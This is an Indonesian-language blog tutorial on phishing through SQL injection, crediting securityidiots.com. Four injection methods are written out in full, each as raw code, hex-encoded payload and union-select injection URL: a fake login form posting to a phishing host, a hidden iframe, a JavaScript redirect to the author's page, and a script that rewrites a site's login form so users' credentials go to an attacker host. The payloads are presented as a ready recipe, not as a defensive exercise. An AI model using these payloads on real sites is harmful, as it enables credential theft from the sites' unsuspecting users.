kali ini cakil akan share tutorial URL Spoofed Phising Using SQLI
cekidots !!
gua anggap lu udah nemuin error nya
disini error yang gua temuin di 12 yang berarti column sampe di sebelas
nah liat muncul angka 4 dan 8
1.Inject HTML Coded form into Website
kode payload :
<form action=http://linkPhising.com/proses.php method="POST">
username :<input type="text" name="username">
Password :<input type="text" name="password">
<input type="submit">
</form>
<iframe height=0 width=0>
kita gunain hex
example :
0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e
example :
localhost/bug.php?id=1+union+select+1,2,3,payloadnya,4,5,6,7,8,9,10,11--+
2.Injection Iframe into the Website
nah bisa juga menggunakan iframe
code :
<br><iframe src="http://www.site.com/fakePage.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>
kita jadin hex :
code :
3C62723E3C696672616D65207372633D22687474703A2F2F66616365626F6F6B2E636F6D2F22206865696768743D313230302077696474683D31323030206672616D65426F726465723D223022207363726F6C6C696E673D226E6F223E3C2F696672616D653E
karna disini gua ga ada web phising nya jadi gua make blog gua...
localhost/bug.php?id=1+union+select+1,2,3,payloadCode,4,5,6,7,8,9,10,11--+
3.Redirect user to Your Fake Page
kali ini gua akan menyuntikkan javascript di situs web yang akan mengarahkan pengguna ke halaman utama gua
example code :
<script>window.location.href="http://www.mrcakil.tech/fakepage.php"</script>
hex code :
3C7363726970743E77696E646F772E6C6F636174696F6E2E687265663D22687474703A2F2F7777772E6D7263616B696C2E746563682F66616B65706167652E706870223C2F7363726970743E
example inject :
localhost/bug.php?id=1+union+select+1,2,3,payloadCode,4,5,6,7,8,9,10,11--+
Url di atas akan menyuntikkan javascript ke halaman yang akan mengarahkan pengguna ke halaman utama gua, di mana jika ia login kredensial akan dikirim ke Penyerang. Kekurangannya adalah bagian spoofing URL. Yang akan kita bahas dalam serangan berikutnya.
4.meng inject javascript untuk mengubah login page
Dalam serangan ini gua akan menyuntikkan javascript di situs web yang akan mengubah tindakan halaman login saat ini di situs ke tautan halaman login palsu milik gua.
code :
<script>document.getElementsByTagName("form")[0].action="http://www.site.com/fakepage.php"</script>
hex code :
0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e
example inject:
localhost/bug.php?id=1+union+select+1,2,3,payloadCode,4,5,6,7,8,9,10,11--+
url di atas akan menyuntikkan javascript ke halaman yang akan mengirim kredensial pengguna yang masuk ke halaman nyata ke halaman utama gua.
oke mungkin itu aja hehe selamat beraktifitas kembali
jangan lupa kunjungi blog ini trus ya akan ada update an terbaru
request ?? komen sadja :)
thanks
source : http://www.securityidiots.com
1 Comments
Boleh masuk grup WA nya gan?
ReplyDelete